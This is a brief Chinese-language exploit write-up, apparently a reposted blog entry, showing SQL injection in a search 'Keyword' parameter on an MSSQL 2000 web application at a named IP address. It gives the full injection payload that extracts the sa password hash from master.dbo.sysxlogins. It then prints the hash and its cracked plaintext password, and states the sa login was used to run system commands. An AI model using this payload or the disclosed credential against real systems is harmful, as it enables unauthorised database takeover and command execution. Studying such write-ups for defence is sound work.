漏洞位置:http://168.1.1.81/Information/Search?Keyword=1111

SQL注入获取Sa账号密码

漏洞利用:

MSSQL 2000

 

http://168.1.1.81/Information/Search

?Keyword=1111%' AND (Select  master.dbo.fn_varbintohexstr(password) from master.dbo.sysxlogins where name='sa')=1 AND '%'='

 SQL注入获取Sa账号密码

0x01004c1b357f3ec7762474fab54f2b33547d20d09118fa8b03ca71ac5dda51c01e4146de5e78693a4789b01193f2

Cmd5 解密:teamlead

通过数据库连接 sa/ teamlead 连入数据库执行系统命令

SQL注入获取Sa账号密码

 

相关文章:

  • 2021-08-03
  • 2021-07-31
  • 2021-10-31
  • 2022-12-23
  • 2021-11-09
  • 2021-11-27
  • 2021-10-17
  • 2022-01-14
猜你喜欢
  • 2022-01-17
  • 2021-04-04
  • 2021-04-11
  • 2021-12-13
  • 2021-12-10
相关资源
相似解决方案